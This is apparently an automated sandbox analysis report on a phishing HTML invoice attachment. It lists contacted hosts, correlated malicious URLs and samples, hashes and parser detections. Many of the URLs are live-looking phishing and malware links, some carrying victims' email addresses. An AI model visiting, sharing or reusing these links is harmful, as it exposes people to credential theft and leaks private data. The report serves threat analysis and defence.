142.251.40.228	www.google.com	United States	15169	GOOGLEUS	false
52.96.122.66	MNZ-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.21.6.28	7b6fzcwcqmmd8xoz5.kaisargift.com	United States	13335	CLOUDFLARENETUS	false
151.101.2.137	code.jquery.com	United States	54113	FASTLYUS	false
104.18.11.207	maxcdn.bootstrapcdn.com	United States	13335	CLOUDFLARENETUS	false
172.67.190.19	erfectries.jamesolflt.bond	United States	13335	CLOUDFLARENETUS	false
23.209.72.31	unknown	United States	20940	AKAMAI-ASN1EU	false

Private

IP
192.168.2.9

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1654704
Start date and time:	2025-04-02 15:00:40 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Invoice Confirmation Subscription_2EZHMA9.htm
Detection:	MAL
Classification:	mal84.phis.winHTM@25/32@24/12
Cookbook Comments:	Found application associated with file extension: .htm

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, TextInputHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.176.206, 142.250.80.99, 142.250.80.78, 142.251.163.84, 142.251.40.142, 142.251.40.110, 142.250.65.206, 142.250.65.202, 142.250.80.74, 142.251.40.234, 142.250.80.42, 142.251.40.170, 142.250.64.106, 172.217.165.138, 142.250.80.106, 142.250.81.234, 142.251.40.202, 142.251.32.106, 142.250.65.170, 142.250.72.106, 142.250.176.202, 142.251.41.10, 142.250.65.234, 208.89.73.25, 142.251.40.238, 142.250.65.174, 142.250.81.238, 142.250.65.163, 142.250.80.110, 142.251.35.163, 142.251.35.174, 172.217.165.142, 13.107.246.40, 172.202.163.200, 13.107.246.38, 184.31.69.3
Excluded domains from analysis (whitelisted): logincdn.msauth.net, clients1.google.com, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.17.24.14	Proforma.Invoice.Payment.$$.html	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
	http://vtaurl.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/webfonts/fa-brands-400.woff2
	http://Voyages.CNTraveler.com	Get hash	malicious	Unknown	Browse	cdnjs.cloudflare.com/ajax/libs/ScrollMagic/2.0.5/plugins/animation.gsap.js
23.209.72.9	https://upcdn.io/W23MT6d/raw/PLASSER%20SOUTH%20AFRICA.pdf	Get hash	malicious	HTMLPhisher	Browse
	https://login.microsoftonline.com/redeem?rd=https%3a%2f%2finvitations.microsoft.com%2fredeem%2f%3ftenant%3d99d20d2d-8923-45d8-b9ad-5038c97582e3%26user%3d1e1aadac-fe48-43cc-8022-e2f9bbd92e33%26ticket%3dlLVj1lKTxCDGt1cqkCQXytiMqw4wvbQIxUgS7dyj1lA%25253d%26ver%3d2.0	Get hash	malicious	Unknown	Browse
	https://login.microsoftonline.com/redeem?rd=https%3a%2f%2finvitations.microsoft.com%2fredeem%2f%3ftenant%3d99d20d2d-8923-45d8-b9ad-5038c97582e3%26user%3d1e1aadac-fe48-43cc-8022-e2f9bbd92e33%26ticket%3dlLVj1lKTxCDGt1cqkCQXytiMqw4wvbQIxUgS7dyj1lA%25253d%26ver%3d2.0	Get hash	malicious	Unknown	Browse
	https://revisedemployeehandbook.journeythroughruins.de/GWjWH/?e=nagal.meegel@VSFroup.de	Get hash	malicious	HTMLPhisher	Browse
	https://snu2i.mjt.lu/lnk/AVUAAGf9XKgAAAAAAAAAA9xrFsMAAYKJjLUAAAAAAC68kgBn7Bfqac3lXyTWRGaDtKriXw3emQAq56U/1/cdW9bHmcUWqJ_AB7I3vlvw/aHR0cHM6Ly9jb25zdC5mb3Jtc3RhY2suY29tL2Zvcm1zL2l0Zg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse
	Provider Document.html	Get hash	malicious	HTMLPhisher	Browse
	https://microwaveeng-dot-m365view-318723.uc.r.appspot.com/	Get hash	malicious	HTMLPhisher	Browse
	Revised - Buncombe county government 2025 Handbook33469.doc	Get hash	malicious	Unknown	Browse
	https://yf6j.wzatrge.es/CvYguLlG/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse
	https://res2.showcaseworkshop.com/UC48PXNB6W73ISX1PK71FS0DPANMIH4LQ45SLW8M/r/5HNAJDHGY5IZWPP9MCCDAS/5877514.html?response-content-disposition=attachment%3Bfilename%3D%22Letter%2520of%2520demand.html%22&e=1746316800&s2=838245666bc16fd83e0d8def624300a64e3df0609db970c9443011fc72e137c831b27b9c938762f1ef0ea039a2ee0be8e6ac0583670dddb9609dfa7abd5a509c	Get hash	malicious	Unknown	Browse
40.126.28.19	http://lookerstudio.google.com/reporting/471f6d11-9fc6-4382-92a9-62afa720e974	Get hash	malicious	HTMLPhisher	Browse
	https://flow.page/cresa	Get hash	malicious	HTMLPhisher	Browse
	Audits_Distribution Notice.msg	Get hash	malicious	HTMLPhisher	Browse
	https://70183673.befb1d052c5367780a698112.workers.dev/favicon.icoa5	Get hash	malicious	HTMLPhisher	Browse
	https://trk.klclick2.com/ls/click?upn=HVRWduvhL1zapb3BWQOCNiPIi5Bk5xLLCIGZPop7usQOZKKmWM-2FwHVR04uMIbc47xtIdXZ70-2BNqYC0slo1nan2opQ-2B0-2BSPXYqBzVTOGvUKZN1SahTtz7QmlDPDVfDJipVY4C-2F3dQtPrOpXEgvo4fCQS15iHO9tJjGaId-2FMb-2FkgM-3D4tc5_UQf6CZtgTiGkpBx1ujDHnZAntAuJNxWSG9pjq-2BiEMRDParvahGK2lvPcgi8z-2B-2BWUg4E10bFWhVQPx2J677B6FBKUouSDfFq-2BrhMyxGoFM-2F8OlmejfVTB4PqW6-2FjNChjlUMO-2B-2FXHCYyxLE0zjL9eSFxVBB0U-2BL17Utt4sh-2FoCed8SEzD2sagFG2abKMXdNJ7z8B3sNYIOWG1DEb4GIJgIUqTnJWFBPsjyTZTwjWh2fasTBMud-2BGFZmMBlUYhzyNDWqusvN0q6yzs-2FKzKyCsUKXO9RIzb-2BVNG2oBtNCXWQ548tUzZf1t-2BzLfcHu0MWrm9yF196hpRfidigA7rGe80R-2BoMR4Lt3-2FiXqfBcW2Jf0CqPCxxO-2FMbOmIF5KHqthpQWlSTMx2RinslX-2FyLyq256AseNlyUEOcYp4MVdxlFD5M9JY18wec3WYUGH5-2BObD18daomOPH2b-2FLqYgYJdnS4m0Rg-3D-3D#dGFtaUBnaGVlbmlycmlnYXRpb24uY29t==811p5ps1t1vk90zxdcf=Z29vZ2xlLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse
	https://fedex27.blob.core.windows.net/fedex27/1.html#cl/16732_md/71/14931/3458/19024/294550	Get hash	malicious	Phisher	Browse
40.97.4.1	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse
	GracehealthmiSMKB478467348838.rtf	Get hash	malicious	HTMLPhisher	Browse
	https://www.canva.com/design/DAGAKNghr4A/3gUMtWRotAcalbbQiAq1GQ/edit?utm_content=DAGAKNghr4A&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton	Get hash	malicious	HTMLPhisher	Browse
	https://sheffins.uk/dq.PDF	Get hash	malicious	HTMLPhisher	Browse
	https://www.bleckt.com/bitrix/redirect.php?event1&event2&event3&goto=https://porekel.com	Get hash	malicious	HTMLPhisher	Browse
	Message.scr.exe	Get hash	malicious	MyDoom	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
e329293.dscd.akamaiedge.net	https://upcdn.io/W23MT6d/raw/PLASSER%20SOUTH%20AFRICA.pdf	Get hash	malicious	HTMLPhisher	Browse	23.209.72.9
	https://docs.google.com/presentation/d/e/2PACX-1vQ7Dkd_WRbgSfshqD4oLNlUmDxTYPUSUb2tLr0qsjIwZ7fwYeWMIoyLCuLiIiL3T8QaBj2et0IIqqkz/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	23.209.72.31
	https://login.microsoftonline.com/redeem?rd=https%3a%2f%2finvitations.microsoft.com%2fredeem%2f%3ftenant%3d99d20d2d-8923-45d8-b9ad-5038c97582e3%26user%3d1e1aadac-fe48-43cc-8022-e2f9bbd92e33%26ticket%3dlLVj1lKTxCDGt1cqkCQXytiMqw4wvbQIxUgS7dyj1lA%25253d%26ver%3d2.0	Get hash	malicious	Unknown	Browse	23.209.72.31
	https://login.microsoftonline.com/redeem?rd=https%3a%2f%2finvitations.microsoft.com%2fredeem%2f%3ftenant%3d99d20d2d-8923-45d8-b9ad-5038c97582e3%26user%3d1e1aadac-fe48-43cc-8022-e2f9bbd92e33%26ticket%3dlLVj1lKTxCDGt1cqkCQXytiMqw4wvbQIxUgS7dyj1lA%25253d%26ver%3d2.0	Get hash	malicious	Unknown	Browse	23.209.72.9
	https://snu2i.mjt.lu/lnk/AVUAAGf9XKgAAAAAAAAAA9xrFsMAAYKJjLUAAAAAAC68kgBn7Bfqac3lXyTWRGaDtKriXw3emQAq56U/1/cdW9bHmcUWqJ_AB7I3vlvw/aHR0cHM6Ly9jb25zdC5mb3Jtc3RhY2suY29tL2Zvcm1zL2l0Zg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	23.58.157.16
	Provider Document.html	Get hash	malicious	HTMLPhisher	Browse	23.209.72.9
	https://microwaveeng-dot-m365view-318723.uc.r.appspot.com/	Get hash	malicious	HTMLPhisher	Browse	23.209.72.31
	Revised - Buncombe county government 2025 Handbook33469.doc	Get hash	malicious	Unknown	Browse	23.209.72.9
	Junklessfoods.pdf	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	23.216.132.28
	https://e.pcloud.link/publink/show?code=kZpjpdZXjyvKU8sGYQowC5g4nGGsQWAk0lX	Get hash	malicious	HTMLPhisher	Browse	23.209.72.31
ooc-g2.tm-4.office.com	Provider Document.html	Get hash	malicious	HTMLPhisher	Browse	52.96.242.18
	https://rsedis.online/?fvrjsszu=d51be19066e55b8a6064b9e0a3b0572f4b01f273b84fffd0d3341ca42e38f44ce5080783bb2651cabe6d2dea6cc950fb15bbe3875845e12a194a042ee82c07c2	Get hash	malicious	HTMLPhisher	Browse	52.96.111.2
	MDE_File_Sample_6967f7cc37c242205a7b3340c6732722fcd79584.zip	Get hash	malicious	HTMLPhisher	Browse	40.104.46.18
	http://support.delfi.com	Get hash	malicious	Unknown	Browse	52.96.239.178
	https://thetti-my.sharepoint.com/:f:/p/kellieblack/EtssBivICL5BgQEDfbETZP4BZsoHTOyxYMnSj46dgeiAiA?e=0t2fdm	Get hash	malicious	HTMLPhisher	Browse	40.97.190.18
	460138.pdf	Get hash	malicious	Unknown	Browse	52.96.109.226
	https://api.mixpanel.com/track?data=eyJldmVudCI6ICIkY2FtcGFpZ25fbGlua19jbGljayIsICJwcm9wZXJ0aWVzIjogeyJjYW1wYWlnbl9pZCI6IDUzNzgyMDQsICJkaXN0aW5jdF9pZCI6ICIxNjE4OTgiLCAibWVzc2FnZV9pZCI6IDEyMTE1MDgsICJ0b2tlbiI6ICI4NDhlOGVjYTBjYjdmNGRjZWE1ODljMWIxMTg2NmQ2YSIsICJ0eXBlIjogImVtYWlsIiwgInVybCI6ICJodHRwOi8vd3d3LmdvbGZnYW1lYm9vay5jb20ifX0=&redirect=https://tornillosind.com.mx/g63c/6195742747/Daversapartners/?nl=anVsaWUud3JhcHBAZGF2ZXJzYXBhcnRuZXJzLmNvbQ==	Get hash	malicious	Unknown	Browse	40.97.4.1
	http://lookerstudio%2e%67%6f%6f%67%6c%65%2e%63%6f%6d/s/tVpHSqKmotA	Get hash	malicious	HTMLPhisher	Browse	40.99.149.98
	NEW__Review_202551087.svg	Get hash	malicious	HTMLPhisher	Browse	52.98.179.194
	f492136216_mpengine_dll	Get hash	malicious	Unknown	Browse	52.98.252.226
s-part-0010.t-0009.t-msedge.net	https://rebrand.ly/ittechsupportonline	Get hash	malicious	HTMLPhisher	Browse	13.107.246.38
	Provider Document.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.38
	https://cdn.ampproject.org/c/s/storage.googleapis.com/64537346863/pdpeulwim8hmijrsur818_q3ijp1j8y4ml6p47_0j2my8bsc.html?lt=t_s_jan_293241770520623800_stage&target=293241770520623800_1&utm_rid=293241770520623800_2	Get hash	malicious	Unknown	Browse	13.107.246.38
	MDE_File_Sample_6967f7cc37c242205a7b3340c6732722fcd79584.zip	Get hash	malicious	HTMLPhisher	Browse	13.107.246.38
	ORDER 517-2025.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.38
	https://onedrive.live.com/:o:/g/personal/A19E0D27A159B01D/EjrRUOhvrVRPjf7frmHTxHoBOP8hIZH3Py3RVZphI8BRhg?resid=A19E0D27A159B01D!se850d13aad6f4f548dfedfae61d3c47a&ithint=onenote&e=VRLCee&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy9hMTllMGQyN2ExNTliMDFkL0VqclJVT2h2clZSUGpmN2ZybUhUeEhvQk9QOGhJWkgzUHkzUlZacGhJOEJSaGc_ZT1WUkxDZWU	Get hash	malicious	Unknown	Browse	13.107.246.38
	MDRHZBOL2477518 CO.xls	Get hash	malicious	Unknown	Browse	13.107.246.38
	Proforma invoice.xls	Get hash	malicious	Unknown	Browse	13.107.246.38
	ORDER 517-2025.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.38
	EwZAaQu0yXKbde7.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, XWorm	Browse	13.107.246.38
s-part-0012.t-0009.t-msedge.net	http://www.bankmenia.fr	Get hash	malicious	Unknown	Browse	13.107.246.40
	https://upcdn.io/W23MT6d/raw/PLASSER%20SOUTH%20AFRICA.pdf	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	https://docs.google.com/presentation/d/e/2PACX-1vQ7Dkd_WRbgSfshqD4oLNlUmDxTYPUSUb2tLr0qsjIwZ7fwYeWMIoyLCuLiIiL3T8QaBj2et0IIqqkz/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	13.107.246.40
	https://login.microsoftonline.com/redeem?rd=https%3a%2f%2finvitations.microsoft.com%2fredeem%2f%3ftenant%3d99d20d2d-8923-45d8-b9ad-5038c97582e3%26user%3d1e1aadac-fe48-43cc-8022-e2f9bbd92e33%26ticket%3dlLVj1lKTxCDGt1cqkCQXytiMqw4wvbQIxUgS7dyj1lA%25253d%26ver%3d2.0	Get hash	malicious	Unknown	Browse	13.107.246.40
	https://login.microsoftonline.com/redeem?rd=https%3a%2f%2finvitations.microsoft.com%2fredeem%2f%3ftenant%3d99d20d2d-8923-45d8-b9ad-5038c97582e3%26user%3d1e1aadac-fe48-43cc-8022-e2f9bbd92e33%26ticket%3dlLVj1lKTxCDGt1cqkCQXytiMqw4wvbQIxUgS7dyj1lA%25253d%26ver%3d2.0	Get hash	malicious	Unknown	Browse	13.107.246.40
	paste.ee_d_ktyPclYy.js	Get hash	malicious	Remcos	Browse	13.107.246.40
	a.ps1	Get hash	malicious	PureCrypter, AsyncRAT	Browse	13.107.246.40
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.40
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.40
	Inquiry-140-120.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.246.40

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://bridge.tree-sock-rain.today/	Get hash	malicious	Unknown	Browse	172.67.185.96
	ZPZ1v1jD1L.ps1	Get hash	malicious	Vidar	Browse	172.66.47.181
	nqa3yj3p7N.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	letter2481-fitocosmetic.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.112.233
	letter2481-fitocosmetic.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.112.233
	BESTELLUNG24730.EXE.exe	Get hash	malicious	FormBook	Browse	172.67.217.209
	https://upcdn.io/W23MT6d/raw/PLASSER%20SOUTH%20AFRICA.pdf	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://bpc.ldpkkacq.es/MgZjXO/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.17.25.14
	https://app.capacities.io/home/63046a91-df50-4ebb-84ab-5f0bf1208f6f	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.17.25.14
	SETTLED.REF344266.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
AKAMAI-ASN1EU	nqa3yj3p7N.exe	Get hash	malicious	Vidar	Browse	23.44.203.80
	https://upcdn.io/W23MT6d/raw/PLASSER%20SOUTH%20AFRICA.pdf	Get hash	malicious	HTMLPhisher	Browse	23.209.72.9
	https://docs.google.com/presentation/d/e/2PACX-1vQ7Dkd_WRbgSfshqD4oLNlUmDxTYPUSUb2tLr0qsjIwZ7fwYeWMIoyLCuLiIiL3T8QaBj2et0IIqqkz/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	23.55.235.240
	https://login.microsoftonline.com/redeem?rd=https%3a%2f%2finvitations.microsoft.com%2fredeem%2f%3ftenant%3d99d20d2d-8923-45d8-b9ad-5038c97582e3%26user%3d1e1aadac-fe48-43cc-8022-e2f9bbd92e33%26ticket%3dlLVj1lKTxCDGt1cqkCQXytiMqw4wvbQIxUgS7dyj1lA%25253d%26ver%3d2.0	Get hash	malicious	Unknown	Browse	23.55.235.240
	utorrent_installer.exe	Get hash	malicious	Unknown	Browse	23.219.161.150
	utorrent_installer.exe	Get hash	malicious	Unknown	Browse	23.44.136.139
	https://www.notion.so/1c85839ca3918049b295de37b1c532aa	Get hash	malicious	HTMLPhisher	Browse	23.219.36.108
	https://login.microsoftonline.com/redeem?rd=https%3a%2f%2finvitations.microsoft.com%2fredeem%2f%3ftenant%3d99d20d2d-8923-45d8-b9ad-5038c97582e3%26user%3d1e1aadac-fe48-43cc-8022-e2f9bbd92e33%26ticket%3dlLVj1lKTxCDGt1cqkCQXytiMqw4wvbQIxUgS7dyj1lA%25253d%26ver%3d2.0	Get hash	malicious	Unknown	Browse	23.55.235.240
	yuioiuy.txt.ps1	Get hash	malicious	Unknown	Browse	23.55.235.240
	xd.ppc.elf	Get hash	malicious	Mirai	Browse	172.236.27.176
MICROSOFT-CORP-MSN-AS-BLOCKUS	http://www.bankmenia.fr	Get hash	malicious	Unknown	Browse	13.107.246.40
	nqa3yj3p7N.exe	Get hash	malicious	Vidar	Browse	204.79.197.203
	https://login.microsoftonline.com/redeem?rd=https%3a%2f%2finvitations.microsoft.com%2fredeem%2f%3ftenant%3d99d20d2d-8923-45d8-b9ad-5038c97582e3%26user%3d1e1aadac-fe48-43cc-8022-e2f9bbd92e33%26ticket%3dlLVj1lKTxCDGt1cqkCQXytiMqw4wvbQIxUgS7dyj1lA%25253d%26ver%3d2.0	Get hash	malicious	Unknown	Browse	20.190.144.137
	utorrent_installer.exe	Get hash	malicious	Unknown	Browse	13.107.42.16
	utorrent_installer.exe	Get hash	malicious	Unknown	Browse	52.159.108.190
	https://www.notion.so/1c85839ca3918049b295de37b1c532aa	Get hash	malicious	HTMLPhisher	Browse	13.107.42.14
	https://login.microsoftonline.com/redeem?rd=https%3a%2f%2finvitations.microsoft.com%2fredeem%2f%3ftenant%3d99d20d2d-8923-45d8-b9ad-5038c97582e3%26user%3d1e1aadac-fe48-43cc-8022-e2f9bbd92e33%26ticket%3dlLVj1lKTxCDGt1cqkCQXytiMqw4wvbQIxUgS7dyj1lA%25253d%26ver%3d2.0	Get hash	malicious	Unknown	Browse	40.126.24.81
	xd.mips.elf	Get hash	malicious	Mirai	Browse	20.30.189.168
	xd.arm.elf	Get hash	malicious	Mirai	Browse	20.96.76.152
	yuioiuy.txt.ps1	Get hash	malicious	Unknown	Browse	204.79.197.203
MICROSOFT-CORP-MSN-AS-BLOCKUS	http://www.bankmenia.fr	Get hash	malicious	Unknown	Browse	13.107.246.40
	nqa3yj3p7N.exe	Get hash	malicious	Vidar	Browse	204.79.197.203
	https://login.microsoftonline.com/redeem?rd=https%3a%2f%2finvitations.microsoft.com%2fredeem%2f%3ftenant%3d99d20d2d-8923-45d8-b9ad-5038c97582e3%26user%3d1e1aadac-fe48-43cc-8022-e2f9bbd92e33%26ticket%3dlLVj1lKTxCDGt1cqkCQXytiMqw4wvbQIxUgS7dyj1lA%25253d%26ver%3d2.0	Get hash	malicious	Unknown	Browse	20.190.144.137
	utorrent_installer.exe	Get hash	malicious	Unknown	Browse	13.107.42.16
	utorrent_installer.exe	Get hash	malicious	Unknown	Browse	52.159.108.190
	https://www.notion.so/1c85839ca3918049b295de37b1c532aa	Get hash	malicious	HTMLPhisher	Browse	13.107.42.14
	https://login.microsoftonline.com/redeem?rd=https%3a%2f%2finvitations.microsoft.com%2fredeem%2f%3ftenant%3d99d20d2d-8923-45d8-b9ad-5038c97582e3%26user%3d1e1aadac-fe48-43cc-8022-e2f9bbd92e33%26ticket%3dlLVj1lKTxCDGt1cqkCQXytiMqw4wvbQIxUgS7dyj1lA%25253d%26ver%3d2.0	Get hash	malicious	Unknown	Browse	40.126.24.81
	xd.mips.elf	Get hash	malicious	Mirai	Browse	20.30.189.168
	xd.arm.elf	Get hash	malicious	Mirai	Browse	20.96.76.152
	yuioiuy.txt.ps1	Get hash	malicious	Unknown	Browse	204.79.197.203

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	http://www.bankmenia.fr	Get hash	malicious	Unknown	Browse	2.23.227.208
	paste.ee_d_ktyPclYy.js	Get hash	malicious	Remcos	Browse	2.23.227.208
	Revolt.bat	Get hash	malicious	HTMLPhisher	Browse	2.23.227.208
	cfr4.txt.ps1	Get hash	malicious	Unknown	Browse	2.23.227.208
	a.ps1	Get hash	malicious	PureCrypter, AsyncRAT	Browse	2.23.227.208
	https://rebrand.ly/ittechsupportonline	Get hash	malicious	HTMLPhisher	Browse	2.23.227.208
	https://www.terrabellaseniorliving.com/terrabella-little-avenue/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	2.23.227.208
	https://buildin.ai/share/5a345237-8f26-47b9-9ffb-209d1d646648?code=0GHW42&embed=true	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	2.23.227.208
	PO-Payment-Slip.vbs	Get hash	malicious	XWorm	Browse	2.23.227.208
	F Notice Docx 433 (1).html	Get hash	malicious	HTMLPhisher	Browse	2.23.227.208

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Zstandard compressed data (v0.8+), Dictionary ID: None
Category:	downloaded
Size (bytes):	17389
Entropy (8bit):	7.983157770671949
Encrypted:	false
SSDEEP:	384:D/cVu4YROSisghNiVIDMOt1qQ0E8YVQfdqw2VPHNGZfK:D/cVu4GOSoiVIQO8JqCC
MD5:	F3AA4D497E116A893BF6D06E620F6CD5
SHA1:	FEF155F99CD139708B5936FB5CD9B90C3E68E983
SHA-256:	CE64EC14DD1D56C18351F476A8B0A7C4150DBE9A6896AB05EF30095C8506873F
SHA-512:	676723706A3529DFB9A3DE035396891394B2219F8CF0706E929DCB340015584C55A49073CBF57E853C2DC570D5764133611992D51B683807E38937828547258F
Malicious:	false
Reputation:	low
URL:	https://7b6fzcwcqmmd8xoz5.kaisargift.com:8443/impact?LLr0YW2RikMSdJfpf=paul.neff@genexservices.com
Preview:	(./..X.....Ny..JD..P...QYi".bn.(..7.f^..bYg...%..K...I.2`.......`..KH.9..S..,x..[....NR....{&..p.=..../.......C...^bT;.T..g.!L.....p.f...#.\D;.wX.....f......&Bx.F.$..`...t..#4.w..f........nJaf..fZ...q5..q..I....._T.p.1...-[)e.."R..Cc....."...h....-..o...n.NgZ.K.vrn%.le....B.H......@dU.i.beQ.r....K.j..VT...E..u.n.BDK.s.t,...Z@.t'X.A.s....ek.L.UY.._DF...s......&`~{........u...5.D....T<.k!D9..<%"!.D...<.;._.l.D....3...w.o?x+.h.5.>.3..uF^3..8vu/(.U.#X{.J...'T.Vna.n.~t.@.E....U.-.tK..C.....5.Cci....S.MT.-.k...+ .+ .k.3.t..X...G...(x..m. ......(..1.=F.).G..p.9...ZTpw.......s..%w.) .....".n.M.q..{`t'.l..`9%..I].Q...Q.D^.......~..Z....}...P.\_.b...=...2.w.Vb............!..J.!..{j......R..lrW;......".V..c......}`q..N.E..t..fnN.7...1.'=./1....,;...+....nl.9$k.v...T9.@..D.[..T../..Y....cR.,..t`..hd...pb..E7.Z...2...YvX.u T-.g.ht.........W.;...}<.Hw....=...A.C....+..@l...5..o..7.NE.`.0s...B......n...K..K..K.H.\V%y#5.Ed.f;.`...7O...>.(-..VZ.}

Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.5.pages.csv
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.6.pages.csv

Source: Yara match	File source: 0.6.pages.csv, type: HTML
Source: Yara match	File source: 0.2.pages.csv, type: HTML
Source: Yara match	File source: 0.5.pages.csv, type: HTML
Source: Yara match	File source: 0.7.pages.csv, type: HTML
Source: Yara match	File source: 0.4.pages.csv, type: HTML

Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: New script tag found
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: New script tag found

Source: Invoice Confirmation Subscription_2EZHMA9.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Invoice%20Confirmation%20Subscription_2EZHMA9.htm	HTTP Parser: No <meta name="copyright".. found
